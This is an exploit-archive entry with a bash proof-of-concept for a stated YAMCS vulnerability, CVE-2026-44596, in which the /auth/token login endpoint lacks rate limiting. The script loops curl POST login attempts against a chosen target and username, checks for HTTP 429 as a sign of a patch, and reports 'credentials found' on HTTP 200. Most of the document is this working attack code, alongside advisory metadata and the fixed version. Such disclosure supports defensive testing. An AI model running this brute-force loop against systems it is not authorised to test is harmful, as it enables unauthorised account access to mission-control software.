# Exploit Title: YAMCS yamcs-core 5.12.7 - No Rate Limiting # Date: 2026-05-27 # Exploit Author: Daniel Miranda Barcelona (Excal1bur) # Vendor Homepage: https://yamcs.org # Software Link: https://github.com/yamcs/yamcs # Version: < 5.12.7 # Tested on: Linux # CVE: CVE-2026-44596 # Category: Remote / Brute Force # Advisory: https://github.com/yamcs/yamcs/security/advisories/GHSA-w5r6-mcgq-7pq4 #!/bin/bash # ============================================================ # CVE-2026-44596 — YAMCS No Rate Limiting on /auth/token # ============================================================ # Vulnerability: POST /auth/token accepts unlimited login # attempts with no rate limiting or lockout. # Impact: Unauthenticated brute-force of any account. # Affected: yamcs-core < 5.12.7 # Fixed in: yamcs-core 5.12.7 # CWE: CWE-307 # CVSS: 5.3 MEDIUM # ============================================================ # Usage: ./poc.sh [target] [username] [attempts] # Example: ./poc.sh http://localhost:8090 operator 20 # ============================================================ TARGET="${1:-http://localhost:8090}" USERNAME="${2:-operator}" ATTEMPTS="${3:-20}" LAST_STATUS="" echo "============================================================" echo " CVE-2026-44596 — YAMCS No Rate Limiting PoC" echo " Target: $TARGET" echo " Username: $USERNAME" echo " Attempts: $ATTEMPTS" echo "============================================================" echo "" echo "[*] Sending $ATTEMPTS unauthenticated login attempts..." echo "[*] Vulnerable: HTTP 401 every time, never HTTP 429" echo "" for i in $(seq 1 $ATTEMPTS); do RESPONSE=$(curl -s -o /dev/null -w "%{http_code}" \ -X POST "$TARGET/auth/token" \ -H "Content-Type: application/x-www-form-urlencoded" \ -d "grant_type=password&username=$USERNAME&password=wrongpass$i") echo " Attempt $i/$ATTEMPTS: HTTP $RESPONSE" LAST_STATUS=$RESPONSE if [ "$RESPONSE" = "429" ]; then echo "" echo "[+] HTTP 429 received — rate limiting active (PATCHED)" exit 0 fi if [ "$RESPONSE" = "200" ]; then echo "" echo "[!!!] HTTP 200 — credentials found at attempt $i" exit 0 fi done echo "" if [ "$LAST_STATUS" = "401" ]; then echo "[!!!] VULNERABLE: $ATTEMPTS attempts, no rate limiting detected" echo "[!!!] Brute-force possible without restriction" fi echo "" echo "============================================================" echo " Fix: Upgrade to yamcs-core >= 5.12.7" echo "============================================================"